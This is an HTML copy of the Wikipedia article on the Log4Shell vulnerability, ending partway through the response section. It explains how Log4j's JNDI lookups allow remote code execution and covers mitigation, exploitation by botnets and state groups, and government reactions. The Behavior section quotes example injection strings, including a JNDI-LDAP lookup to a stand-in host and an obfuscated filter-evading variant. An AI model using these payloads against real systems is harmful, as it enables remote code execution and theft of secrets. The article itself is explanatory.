Micron Document
<!DOCTYPE html>
<html class="client-nojs vector-feature-night-mode-disabled vector-feature-language-in-header-enabled vector-feature-language-in-main-page-header-disabled vector-feature-page-tools-pinned-disabled vector-feature-toc-pinned-clientpref-1 vector-feature-main-menu-pinned-disabled vector-feature-limited-width-clientpref-1 vector-feature-limited-width-content-enabled vector-feature-custom-font-size-clientpref-1 vector-feature-appearance-pinned-clientpref-1 vector-sticky-header-enabled" lang="en" dir="ltr"><head>
<meta charset="UTF-8">
<title>Log4Shell</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="canonical" href="https://en.wikipedia.org/wiki/Log4Shell"> <link href="./mw/ext.cite.styles.css" rel="stylesheet" type="text/css">
<link href="./mw/skins.vector.icons.css" rel="stylesheet" type="text/css">
<link href="./mw/skins.vector.search.codex.styles.css" rel="stylesheet" type="text/css">
<link href="./mw/skins.vector.styles.css" rel="stylesheet" type="text/css">
<link href="./mw/user.styles.css" rel="stylesheet" type="text/css">
<meta name="ResourceLoaderDynamicStyles" content="">
<link rel="stylesheet" type="text/css" href="./mw/site.styles.css">
<link rel="stylesheet" type="text/css" href="./mw/noscript.css">
<link rel="stylesheet" type="text/css" href="./footer.css">
<link rel="stylesheet" type="text/css" href="./vector-2022.css">
</head>
<body class="skin--responsive skin-vector skin-vector-search-vue mediawiki ltr sitedir-ltr mw-hide-empty-elt ns-0 ns-subject page-Log4Shell rootpage-Log4Shell skin-vector-2022 action-view">
<div class="mw-page-container">
<div class="mw-page-container-inner">
<div class="mw-content-container">
<main id="content" class="mw-body">
<header class="mw-body-header vector-page-titlebar">
<h1 id="firstHeading" class="firstHeading mw-first-heading">
<span id="openzim-page-title" class="mw-page-title-main"><span class="mw-page-title-main">Log4Shell</span></span>
</h1>
</header>
<a id="top"></a>
<div id="bodyContent" class="vector-body ve-init-mw-desktopArticleTarget-targetContainer" aria-labelledby="firstHeading" data-mw-ve-target-container="">
<div id="mw-content-text" class="mw-body-content mw-content-ltr" lang="en" dir="ltr"><div class="mw-content-ltr mw-parser-output" lang="en" dir="ltr">
<p class="mw-empty-elt">

</p>
<style data-mw-deduplicate="TemplateStyles:r1295905060">
/* start https://en.wikipedia.org/ */


.mw-parser-output .infobox-subbox{padding:0;border:none;margin:-3px;width:auto;min-width:100%;font-size:100%;clear:none;float:none;background-color:transparent}.mw-parser-output .infobox-3cols-child{margin:auto}.mw-parser-output .infobox .navbar{font-size:100%}@media screen{html.skin-theme-clientpref-night .mw-parser-output .infobox-full-data:not(.notheme)>div:not(.notheme)[style]{background:#1f1f23!important;color:#f8f9fa}}@media screen and (prefers-color-scheme:dark){html.skin-theme-clientpref-os .mw-parser-output .infobox-full-data:not(.notheme)>div:not(.notheme)[style]{background:#1f1f23!important;color:#f8f9fa}}@media(min-width:640px){body.skin--responsive .mw-parser-output .infobox-table{display:table!important}body.skin--responsive .mw-parser-output .infobox-table>caption{display:table-caption!important}body.skin--responsive .mw-parser-output .infobox-table>tbody{display:table-row-group}body.skin--responsive .mw-parser-output .infobox-table th,body.skin--responsive .mw-parser-output .infobox-table td{padding-left:inherit;padding-right:inherit}}


/* end https://en.wikipedia.org/ */
</style><table class="infobox"><caption class="infobox-title">Log4Shell</caption><tbody><tr><th scope="row" class="infobox-label"><a href="CVE_(identifier)" class="mw-redirect" title="CVE (identifier)">CVE identifier(s)</a></th><td class="infobox-data">CVE-<style data-mw-deduplicate="TemplateStyles:r1238218222">
/* start https://en.wikipedia.org/ */


.mw-parser-output cite.citation{font-style:inherit;word-wrap:break-word}.mw-parser-output .citation q{quotes:"\"""\"""'""'"}.mw-parser-output .citation:target{background-color:rgba(0,127,255,0.133)}.mw-parser-output .id-lock-free.id-lock-free a{background:url("./mw/Lock-green.svg")right 0.1em center/9px no-repeat}.mw-parser-output .id-lock-limited.id-lock-limited a,.mw-parser-output .id-lock-registration.id-lock-registration a{background:url("./mw/Lock-gray-alt-2.svg")right 0.1em center/9px no-repeat}.mw-parser-output .id-lock-subscription.id-lock-subscription a{background:url("./mw/Lock-red-alt-2.svg")right 0.1em center/9px no-repeat}.mw-parser-output .cs1-ws-icon a{background:url("./mw/Wikisource-logo.svg")right 0.1em center/12px no-repeat}body:not(.skin-timeless):not(.skin-minerva) .mw-parser-output .id-lock-free a,body:not(.skin-timeless):not(.skin-minerva) .mw-parser-output .id-lock-limited a,body:not(.skin-timeless):not(.skin-minerva) .mw-parser-output .id-lock-registration a,body:not(.skin-timeless):not(.skin-minerva) .mw-parser-output .id-lock-subscription a,body:not(.skin-timeless):not(.skin-minerva) .mw-parser-output .cs1-ws-icon a{background-size:contain;padding:0 1em 0 0}.mw-parser-output .cs1-code{color:inherit;background:inherit;border:none;padding:inherit}.mw-parser-output .cs1-hidden-error{display:none;color:var(--color-error,#d33)}.mw-parser-output .cs1-visible-error{color:var(--color-error,#d33)}.mw-parser-output .cs1-maint{display:none;color:#085;margin-left:0.3em}.mw-parser-output .cs1-kern-left{padding-left:0.2em}.mw-parser-output .cs1-kern-right{padding-right:0.2em}.mw-parser-output .citation .mw-selflink{font-weight:inherit}@media screen{.mw-parser-output .cs1-format{font-size:95%}html.skin-theme-clientpref-night .mw-parser-output .cs1-maint{color:#18911f}}@media screen and (prefers-color-scheme:dark){html.skin-theme-clientpref-os .mw-parser-output .cs1-maint{color:#18911f}}


/* end https://en.wikipedia.org/ */
</style><a rel="nofollow" class="external text" href="https://nvd.nist.gov/vuln/detail/CVE-2021-44228">2021-44228</a></td></tr><tr><th scope="row" class="infobox-label">Date discovered</th><td class="infobox-data">24&nbsp;November 2021<span style="display:none">&nbsp;(<span class="bday dtstart published updated">2021-11-24</span>)</span></td></tr><tr><th scope="row" class="infobox-label">Date patched</th><td class="infobox-data">9&nbsp;December 2021<span style="display:none">&nbsp;(<span class="bday dtstart published updated">2021-12-09</span>)</span></td></tr><tr><th scope="row" class="infobox-label">Discoverer</th><td class="infobox-data">Chen Zhaojun of the <a href="Alibaba_Cloud" title="Alibaba Cloud">Alibaba Cloud</a> Security Team<sup id="cite_ref-mcafee_1-0" class="reference"><a href="#cite_note-mcafee-1"><span class="cite-bracket">[</span>1<span class="cite-bracket">]</span></a></sup></td></tr><tr><th scope="row" class="infobox-label">Affected software</th><td class="infobox-data">Applications logging user input using <a href="Log4j" title="Log4j">Log4j</a> 2</td></tr></tbody></table>
<p><b>Log4Shell</b> (<b>CVE-2021-44228</b>) is a <a href="Zero-day_(computing)" class="mw-redirect" title="Zero-day (computing)">zero-day</a> vulnerability reported in November 2021 in <a href="Log4j" title="Log4j">Log4j</a>, a popular <a href="Java_logging_framework" title="Java logging framework">Java logging framework</a>, involving <a href="Arbitrary_code_execution" title="Arbitrary code execution">arbitrary code execution</a>.<sup id="cite_ref-lunasec_2-0" class="reference"><a href="#cite_note-lunasec-2"><span class="cite-bracket">[</span>2<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-3" class="reference"><a href="#cite_note-3"><span class="cite-bracket">[</span>3<span class="cite-bracket">]</span></a></sup> The vulnerability had existed unnoticed since 2013 and was privately disclosed to <a href="The_Apache_Software_Foundation" title="The Apache Software Foundation">the Apache Software Foundation</a>, of which Log4j is a project, by Chen Zhaojun of <a href="Alibaba_Cloud" title="Alibaba Cloud">Alibaba Cloud</a>'s security team on 24 November 2021.<sup id="cite_ref-4" class="reference"><a href="#cite_note-4"><span class="cite-bracket">[</span>4<span class="cite-bracket">]</span></a></sup>
</p><p>Before an official CVE identifier was made available on 10 December 2021, the vulnerability circulated with the name "Log4Shell", given by Free Wortley of the LunaSec team, which was initially used to track the issue online.<sup id="cite_ref-lunasec_2-1" class="reference"><a href="#cite_note-lunasec-2"><span class="cite-bracket">[</span>2<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-mcafee_1-1" class="reference"><a href="#cite_note-mcafee-1"><span class="cite-bracket">[</span>1<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-5" class="reference"><a href="#cite_note-5"><span class="cite-bracket">[</span>5<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-wired_6-0" class="reference"><a href="#cite_note-wired-6"><span class="cite-bracket">[</span>6<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-:0_7-0" class="reference"><a href="#cite_note-:0-7"><span class="cite-bracket">[</span>7<span class="cite-bracket">]</span></a></sup> Apache gave Log4Shell a <a href="Common_Vulnerability_Scoring_System" title="Common Vulnerability Scoring System">CVSS</a> severity rating of 10, the highest available score.<sup id="cite_ref-security_8-0" class="reference"><a href="#cite_note-security-8"><span class="cite-bracket">[</span>8<span class="cite-bracket">]</span></a></sup> The exploit was simple to execute and is estimated to have had the potential to affect hundreds of millions of devices.<sup id="cite_ref-:0_7-1" class="reference"><a href="#cite_note-:0-7"><span class="cite-bracket">[</span>7<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-:7_9-0" class="reference"><a href="#cite_note-:7-9"><span class="cite-bracket">[</span>9<span class="cite-bracket">]</span></a></sup>
</p><p>The vulnerability takes advantage of Log4j's allowing requests to arbitrary <a href="Lightweight_Directory_Access_Protocol" title="Lightweight Directory Access Protocol">LDAP</a> and <a href="Java_Naming_and_Directory_Interface" title="Java Naming and Directory Interface">JNDI</a> servers,<sup id="cite_ref-lunasec_2-2" class="reference"><a href="#cite_note-lunasec-2"><span class="cite-bracket">[</span>2<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-pcworld_10-0" class="reference"><a href="#cite_note-pcworld-10"><span class="cite-bracket">[</span>10<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-technica_11-0" class="reference"><a href="#cite_note-technica-11"><span class="cite-bracket">[</span>11<span class="cite-bracket">]</span></a></sup> allowing attackers to execute arbitrary Java code on a server or other computer, or leak sensitive information.<sup id="cite_ref-wired_6-1" class="reference"><a href="#cite_note-wired-6"><span class="cite-bracket">[</span>6<span class="cite-bracket">]</span></a></sup> A list of its affected software projects has been published by the <a href="The_Apache_Software_Foundation" title="The Apache Software Foundation">Apache Security Team</a>.<sup id="cite_ref-12" class="reference"><a href="#cite_note-12"><span class="cite-bracket">[</span>12<span class="cite-bracket">]</span></a></sup> Affected commercial services include <a href="Amazon_Web_Services" title="Amazon Web Services">Amazon Web Services</a>,<sup id="cite_ref-13" class="reference"><a href="#cite_note-13"><span class="cite-bracket">[</span>13<span class="cite-bracket">]</span></a></sup> <a href="Cloudflare" title="Cloudflare">Cloudflare</a>, <a href="ICloud" title="ICloud">iCloud</a>,<sup id="cite_ref-14" class="reference"><a href="#cite_note-14"><span class="cite-bracket">[</span>14<span class="cite-bracket">]</span></a></sup> <i><a href="Minecraft" title="Minecraft">Minecraft: Java Edition</a></i>,<sup id="cite_ref-15" class="reference"><a href="#cite_note-15"><span class="cite-bracket">[</span>15<span class="cite-bracket">]</span></a></sup> <a href="Steam_(service)" title="Steam (service)">Steam</a>, <a href="Tencent_QQ" title="Tencent QQ">Tencent QQ</a> and many others.<sup id="cite_ref-pcworld_10-1" class="reference"><a href="#cite_note-pcworld-10"><span class="cite-bracket">[</span>10<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-16" class="reference"><a href="#cite_note-16"><span class="cite-bracket">[</span>16<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-17" class="reference"><a href="#cite_note-17"><span class="cite-bracket">[</span>17<span class="cite-bracket">]</span></a></sup> According to <a href="Wiz_(company)" class="mw-redirect" title="Wiz (company)">Wiz</a> and <a href="Ernst_%26_Young" title="Ernst &amp; Young">EY</a>, the vulnerability affected 93% of enterprise cloud environments.<sup id="cite_ref-:6_18-0" class="reference"><a href="#cite_note-:6-18"><span class="cite-bracket">[</span>18<span class="cite-bracket">]</span></a></sup>
</p><p>The vulnerability's disclosure received strong reactions from cybersecurity experts. Cybersecurity company <a href="Tenable%2C_Inc." title="Tenable, Inc.">Tenable</a> said the exploit was "the single biggest, most critical vulnerability ever,"<sup id="cite_ref-:4_19-0" class="reference"><a href="#cite_note-:4-19"><span class="cite-bracket">[</span>19<span class="cite-bracket">]</span></a></sup> <i><a href="Ars_Technica" title="Ars Technica">Ars Technica</a></i> called it "arguably the most severe vulnerability ever"<sup id="cite_ref-:1_20-0" class="reference"><a href="#cite_note-:1-20"><span class="cite-bracket">[</span>20<span class="cite-bracket">]</span></a></sup> and <i><a href="The_Washington_Post" title="The Washington Post">The Washington Post</a></i> said that descriptions by security professionals "border on the apocalyptic."<sup id="cite_ref-:7_9-1" class="reference"><a href="#cite_note-:7-9"><span class="cite-bracket">[</span>9<span class="cite-bracket">]</span></a></sup>
</p>
<meta property="mw:PageProp/toc">
<div class="mw-heading mw-heading2"><h2 id="Background">Background</h2></div>
<style data-mw-deduplicate="TemplateStyles:r1236090951">
/* start https://en.wikipedia.org/ */


.mw-parser-output .hatnote{font-style:italic}.mw-parser-output div.hatnote{padding-left:1.6em;margin-bottom:0.5em}.mw-parser-output .hatnote i{font-style:normal}.mw-parser-output .hatnote+link+.hatnote{margin-top:-0.5em}@media print{body.ns-0 .mw-parser-output .hatnote{display:none!important}}


/* end https://en.wikipedia.org/ */
</style><div role="note" class="hatnote navigation-not-searchable">Main article: <a href="Log4j" title="Log4j">Log4j</a></div>
<p>Log4j is an <a href="Open_source" title="Open source">open-source</a> logging framework that allows <a href="Software_developers" class="mw-redirect" title="Software developers">software developers</a> to <a href="Logging_(software)" class="mw-redirect" title="Logging (software)">log</a> data within their applications, and can include user input.<sup id="cite_ref-21" class="reference"><a href="#cite_note-21"><span class="cite-bracket">[</span>21<span class="cite-bracket">]</span></a></sup> It is used ubiquitously in Java applications, especially enterprise software.<sup id="cite_ref-wired_6-2" class="reference"><a href="#cite_note-wired-6"><span class="cite-bracket">[</span>6<span class="cite-bracket">]</span></a></sup> Originally written in 2001 by Ceki Gülcü, it is now part of Apache Logging Services, a project of the <a href="Apache_Software_Foundation" class="mw-redirect" title="Apache Software Foundation">Apache Software Foundation</a>.<sup id="cite_ref-22" class="reference"><a href="#cite_note-22"><span class="cite-bracket">[</span>22<span class="cite-bracket">]</span></a></sup> Tom Kellermann, a member of <a href="Presidency_of_Barack_Obama" title="Presidency of Barack Obama">President Obama</a>'s Commission on Cyber Security, described Apache as "one of the giant supports of a bridge that facilitates the connective tissue between the worlds of applications and computer environments".<sup id="cite_ref-:5_23-0" class="reference"><a href="#cite_note-:5-23"><span class="cite-bracket">[</span>23<span class="cite-bracket">]</span></a></sup>
</p>
<div class="mw-heading mw-heading2"><h2 id="Behavior">Behavior</h2></div>
<p>The <a href="Java_Naming_and_Directory_Interface" title="Java Naming and Directory Interface">Java Naming and Directory Interface</a> (JNDI) allows for lookup of Java objects at program runtime given a path to their data. JNDI can use several directory interfaces, each providing a different scheme of looking up files. Among these interfaces is the <a href="Lightweight_Directory_Access_Protocol" title="Lightweight Directory Access Protocol">Lightweight Directory Access Protocol</a> (LDAP), a non-Java-specific protocol<sup id="cite_ref-24" class="reference"><a href="#cite_note-24"><span class="cite-bracket">[</span>24<span class="cite-bracket">]</span></a></sup> which retrieves the object data as a URL from an appropriate server, either local or anywhere on the Internet.<sup id="cite_ref-cloudflare-graham-cumming_25-0" class="reference"><a href="#cite_note-cloudflare-graham-cumming-25"><span class="cite-bracket">[</span>25<span class="cite-bracket">]</span></a></sup>
</p><p>In the default configuration, when logging a string, Log4j 2 performs string substitution on expressions of the form <code>${prefix:name}</code>.<sup id="cite_ref-cloudflare-graham-cumming_25-1" class="reference"><a href="#cite_note-cloudflare-graham-cumming-25"><span class="cite-bracket">[</span>25<span class="cite-bracket">]</span></a></sup> For example, <code>Text: ${java:version}</code> might be converted to <code>Text: Java version 1.7.0_67</code>.<sup id="cite_ref-26" class="reference"><a href="#cite_note-26"><span class="cite-bracket">[</span>26<span class="cite-bracket">]</span></a></sup> Among the recognized expressions is <code>${jndi:&lt;lookup&gt;}</code>; by specifying the lookup to be through LDAP, an arbitrary URL may be queried and loaded as Java object data. <code>${jndi:ldap://example.com/file}</code>, for example, will load data from that URL if connected to the Internet. By inputting a string that is logged, an attacker can load and execute malicious code hosted on a public URL.<sup id="cite_ref-cloudflare-graham-cumming_25-2" class="reference"><a href="#cite_note-cloudflare-graham-cumming-25"><span class="cite-bracket">[</span>25<span class="cite-bracket">]</span></a></sup> Even if execution of the data is disabled, an attacker can still retrieve data—such as secret <a href="Environment_variable" title="Environment variable">environment variables</a>—by placing them in the URL, in which case they will be substituted and sent to the attacker's server.<sup id="cite_ref-ducklin_27-0" class="reference"><a href="#cite_note-ducklin-27"><span class="cite-bracket">[</span>27<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-28" class="reference"><a href="#cite_note-28"><span class="cite-bracket">[</span>28<span class="cite-bracket">]</span></a></sup> Besides LDAP, other potentially exploitable JNDI lookup protocols include its secure variant LDAPS, <a href="Java_remote_method_invocation" title="Java remote method invocation">Java Remote Method Invocation</a> (RMI), the <a href="Domain_Name_System" title="Domain Name System">Domain Name System</a> (DNS), and the <a href="General_Inter-ORB_Protocol" title="General Inter-ORB Protocol">Internet Inter-ORB Protocol</a> (IIOP).<sup id="cite_ref-29" class="reference"><a href="#cite_note-29"><span class="cite-bracket">[</span>29<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-30" class="reference"><a href="#cite_note-30"><span class="cite-bracket">[</span>30<span class="cite-bracket">]</span></a></sup>
</p><p>Because <a href="HTTP" title="HTTP">HTTP</a> requests are frequently logged, a common attack vector is placing the malicious string in the HTTP request <a href="URL" title="URL">URL</a> or a commonly logged <a href="HTTP_header" class="mw-redirect" title="HTTP header">HTTP header</a>, such as <code>User-Agent</code>. Early mitigations included blocking any requests containing potentially malicious contents, such as <code>${jndi</code>.<sup id="cite_ref-31" class="reference"><a href="#cite_note-31"><span class="cite-bracket">[</span>31<span class="cite-bracket">]</span></a></sup> Such basic string matching solutions can be circumvented by obfuscating the request: <code>${${lower:j}ndi</code>, for example, will be converted into a JNDI lookup after performing the lowercase operation on the letter <code>j</code>.<sup id="cite_ref-32" class="reference"><a href="#cite_note-32"><span class="cite-bracket">[</span>32<span class="cite-bracket">]</span></a></sup> Even if an input, such as a first name, is not immediately logged, it may be later logged during internal processing and its contents executed.<sup id="cite_ref-cloudflare-graham-cumming_25-3" class="reference"><a href="#cite_note-cloudflare-graham-cumming-25"><span class="cite-bracket">[</span>25<span class="cite-bracket">]</span></a></sup>
</p>
<div class="mw-heading mw-heading2"><h2 id="Mitigation">Mitigation</h2></div>
<p>Fixes for this vulnerability were released on 6 December 2021, three days before the vulnerability was published, in Log4j version 2.15.0-rc1.<sup id="cite_ref-33" class="reference"><a href="#cite_note-33"><span class="cite-bracket">[</span>33<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-34" class="reference"><a href="#cite_note-34"><span class="cite-bracket">[</span>34<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-35" class="reference"><a href="#cite_note-35"><span class="cite-bracket">[</span>35<span class="cite-bracket">]</span></a></sup> The fix included restricting the servers and protocols that may be used for lookups. Researchers discovered a related bug, CVE-2021-45046, that allows local or remote code execution in certain non-default configurations and was fixed in version 2.16.0, which disabled all features using JNDI and support for message lookups.<sup id="cite_ref-cve-2021-45056_36-0" class="reference"><a href="#cite_note-cve-2021-45056-36"><span class="cite-bracket">[</span>36<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-37" class="reference"><a href="#cite_note-37"><span class="cite-bracket">[</span>37<span class="cite-bracket">]</span></a></sup> Two more vulnerabilities in the library were found: a <a href="Denial-of-service_attack" title="Denial-of-service attack">denial-of-service attack</a>, tracked as CVE-2021-45105 and fixed in 2.17.0; and a difficult-to-exploit <a href="Arbitrary_code_execution" title="Arbitrary code execution">remote code execution</a> vulnerability, tracked as CVE-2021-44832 and fixed in 2.17.1.<sup id="cite_ref-38" class="reference"><a href="#cite_note-38"><span class="cite-bracket">[</span>38<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-39" class="reference"><a href="#cite_note-39"><span class="cite-bracket">[</span>39<span class="cite-bracket">]</span></a></sup> For previous versions, the class <code>org.apache.logging.log4j.core.lookup.JndiLookup</code> needs to be removed from the <a href="Classpath" title="Classpath">classpath</a> to mitigate both vulnerabilities.<sup id="cite_ref-security_8-1" class="reference"><a href="#cite_note-security-8"><span class="cite-bracket">[</span>8<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-cve-2021-45056_36-1" class="reference"><a href="#cite_note-cve-2021-45056-36"><span class="cite-bracket">[</span>36<span class="cite-bracket">]</span></a></sup> An early recommended fix for older versions was to set the system property <code>log4j2.formatMsgNoLookups</code> to <code>true</code>, but this change does not prevent exploitation of CVE-2021-45046 and was later found to not disable message lookups in certain cases.<sup id="cite_ref-security_8-2" class="reference"><a href="#cite_note-security-8"><span class="cite-bracket">[</span>8<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-cve-2021-45056_36-2" class="reference"><a href="#cite_note-cve-2021-45056-36"><span class="cite-bracket">[</span>36<span class="cite-bracket">]</span></a></sup>
</p><p>Newer versions of the <a href="Java_Runtime_Environment" class="mw-redirect" title="Java Runtime Environment">Java Runtime Environment</a> (JRE) also mitigate this vulnerability by blocking remote code from being loaded by default, although other attack vectors still exist in certain applications.<sup id="cite_ref-lunasec_2-3" class="reference"><a href="#cite_note-lunasec-2"><span class="cite-bracket">[</span>2<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-ducklin_27-1" class="reference"><a href="#cite_note-ducklin-27"><span class="cite-bracket">[</span>27<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-40" class="reference"><a href="#cite_note-40"><span class="cite-bracket">[</span>40<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-41" class="reference"><a href="#cite_note-41"><span class="cite-bracket">[</span>41<span class="cite-bracket">]</span></a></sup> Several methods and tools have been published that help detect vulnerable Log4j versions used in built Java packages.<sup id="cite_ref-lunasec-mitigation-guide_42-0" class="reference"><a href="#cite_note-lunasec-mitigation-guide-42"><span class="cite-bracket">[</span>42<span class="cite-bracket">]</span></a></sup>
</p><p>Where applying updated versions has not been possible, due to a variety of constraints such as lack of resources or third-party managed solutions, filtering outbound network traffic from vulnerable deployments has been the primary recourse for many.<sup id="cite_ref-43" class="reference"><a href="#cite_note-43"><span class="cite-bracket">[</span>43<span class="cite-bracket">]</span></a></sup> The approach is recommended by <a href="NCC_Group" title="NCC Group">NCC Group</a><sup id="cite_ref-44" class="reference"><a href="#cite_note-44"><span class="cite-bracket">[</span>44<span class="cite-bracket">]</span></a></sup> and the <a href="National_Cyber_Security_Centre_(United_Kingdom)" title="National Cyber Security Centre (United Kingdom)">National Cyber Security Centre (United Kingdom)</a>,<sup id="cite_ref-45" class="reference"><a href="#cite_note-45"><span class="cite-bracket">[</span>45<span class="cite-bracket">]</span></a></sup> and is an example of a <a href="Defense_in_depth_(computing)" title="Defense in depth (computing)">defense in depth</a> measure. The effectiveness of such filtering is evidenced<sup id="cite_ref-46" class="reference"><a href="#cite_note-46"><span class="cite-bracket">[</span>46<span class="cite-bracket">]</span></a></sup> by laboratory experiments conducted with firewalls capable of intercepting the egress traffic with several wholly or partially vulnerable versions of the library itself and the <a href="Java_Runtime_Environment" class="mw-redirect" title="Java Runtime Environment">JRE</a>.
</p>
<div class="mw-heading mw-heading2"><h2 id="Usage">Usage</h2></div>
<p>The exploit allows hackers to gain control of vulnerable devices using Java.<sup id="cite_ref-:0_7-2" class="reference"><a href="#cite_note-:0-7"><span class="cite-bracket">[</span>7<span class="cite-bracket">]</span></a></sup> Some hackers employ the vulnerability to use victims' devices for <a href="Cryptocurrency_mining" class="mw-redirect" title="Cryptocurrency mining">cryptocurrency mining</a>, creating <a href="Botnet" title="Botnet">botnets</a>, sending spam, establishing <a href="Backdoor_(computing)" title="Backdoor (computing)">backdoors</a> and other illegal activities such as <a href="Ransomware" title="Ransomware">ransomware</a> attacks.<sup id="cite_ref-:0_7-3" class="reference"><a href="#cite_note-:0-7"><span class="cite-bracket">[</span>7<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-:7_9-2" class="reference"><a href="#cite_note-:7-9"><span class="cite-bracket">[</span>9<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-:2_47-0" class="reference"><a href="#cite_note-:2-47"><span class="cite-bracket">[</span>47<span class="cite-bracket">]</span></a></sup> In the days following the vulnerability's disclosure, <a href="Check_Point" title="Check Point">Check Point</a> observed millions of attacks being initiated by hackers, with some researchers observing a rate of over one hundred attacks per minute that ultimately resulted with attempted attacks on over 40% of business networks internationally.<sup id="cite_ref-:0_7-4" class="reference"><a href="#cite_note-:0-7"><span class="cite-bracket">[</span>7<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-:5_23-1" class="reference"><a href="#cite_note-:5-23"><span class="cite-bracket">[</span>23<span class="cite-bracket">]</span></a></sup>
</p><p>According to <a href="Cloudflare" title="Cloudflare">Cloudflare</a> CEO <a href="Matthew_Prince" title="Matthew Prince">Matthew Prince</a>, evidence of exploitation or of scanning for the exploit goes back as early as 1 December, nine days before it was publicly disclosed.<sup id="cite_ref-duckett2_48-0" class="reference"><a href="#cite_note-duckett2-48"><span class="cite-bracket">[</span>48<span class="cite-bracket">]</span></a></sup> According to cybersecurity firm GreyNoise, several <a href="IP_address" title="IP address">IP addresses</a> were <a href="Web_scraping" title="Web scraping">scraping</a> websites to check for servers that had the vulnerability.<sup id="cite_ref-49" class="reference"><a href="#cite_note-49"><span class="cite-bracket">[</span>49<span class="cite-bracket">]</span></a></sup> Several <a href="Botnet" title="Botnet">botnets</a> began scanning for the vulnerability, including the Muhstik botnet by 10 December, as well as <a href="Mirai_(malware)" title="Mirai (malware)">Mirai</a> and Tsunami.<sup id="cite_ref-:0_7-5" class="reference"><a href="#cite_note-:0-7"><span class="cite-bracket">[</span>7<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-duckett2_48-1" class="reference"><a href="#cite_note-duckett2-48"><span class="cite-bracket">[</span>48<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-50" class="reference"><a href="#cite_note-50"><span class="cite-bracket">[</span>50<span class="cite-bracket">]</span></a></sup> Ransomware group <a href="Conti_(ransomware)" title="Conti (ransomware)">Conti</a> was observed using the vulnerability on 17 December.<sup id="cite_ref-:7_9-3" class="reference"><a href="#cite_note-:7-9"><span class="cite-bracket">[</span>9<span class="cite-bracket">]</span></a></sup>
</p><p>Some state-sponsored groups in China and Iran also utilized the exploit according to Check Point, but it is not known if the exploit was used by Israel, Russia or the United States prior to the disclosure of the vulnerability.<sup id="cite_ref-:7_9-4" class="reference"><a href="#cite_note-:7-9"><span class="cite-bracket">[</span>9<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-:4_19-1" class="reference"><a href="#cite_note-:4-19"><span class="cite-bracket">[</span>19<span class="cite-bracket">]</span></a></sup> Check Point said that on 15 December 2021, Iran-backed hackers attempted to infiltrate the networks of Israeli businesses and government institutions.<sup id="cite_ref-:7_9-5" class="reference"><a href="#cite_note-:7-9"><span class="cite-bracket">[</span>9<span class="cite-bracket">]</span></a></sup>
</p>
<div class="mw-heading mw-heading2"><h2 id="Response_and_impact">Response and impact</h2></div>
<div class="mw-heading mw-heading3"><h3 id="Governmental">Governmental</h3></div>
<p>In the United States, the director of the <a href="Cybersecurity_and_Infrastructure_Security_Agency" title="Cybersecurity and Infrastructure Security Agency">Cybersecurity and Infrastructure Security Agency</a> (CISA), <a href="Jen_Easterly" title="Jen Easterly">Jen Easterly</a>, described the exploit as "one of the most serious I've seen in my entire career, if not the most serious", explaining that hundreds of millions of devices were affected and advising vendors to prioritize software updates.<sup id="cite_ref-:0_7-6" class="reference"><a href="#cite_note-:0-7"><span class="cite-bracket">[</span>7<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-51" class="reference"><a href="#cite_note-51"><span class="cite-bracket">[</span>51<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-:2_47-1" class="reference"><a href="#cite_note-:2-47"><span class="cite-bracket">[</span>47<span class="cite-bracket">]</span></a></sup> Civilian agencies contracted by the United States government had until 24 December 2021 to patch vulnerabilities.<sup id="cite_ref-:7_9-6" class="reference"><a href="#cite_note-:7-9"><span class="cite-bracket">[</span>9<span class="cite-bracket">]</span></a></sup> On 4 January, the <a href="Federal_Trade_Commission" title="Federal Trade Commission">Federal Trade Commission</a> (FTC) stated its intent to pursue companies that fail to take reasonable steps to update used Log4j software.<sup id="cite_ref-52" class="reference"><a href="#cite_note-52"><span class="cite-bracket">[</span>52<span class="cite-bracket">]</span></a></sup> In a White House meeting, the importance of security maintenance of open-source software – often also carried out largely by few volunteers – to national security was clarified. While some open-source projects have <a href="Linus's_law" title="Linus's law">many eyes on them</a>, others do not have many or any people ensuring their security.<sup id="cite_ref-53" class="reference"><a href="#cite_note-53"><span class="cite-bracket">[</span>53<span class="cite-bracket">]</span></a></sup><sup id="cite_ref-54" class="reference"><a href="#cite_note-54"><span class="cite-bracket">[</span>54<span class="cite-bracket">]</span></a></sup>
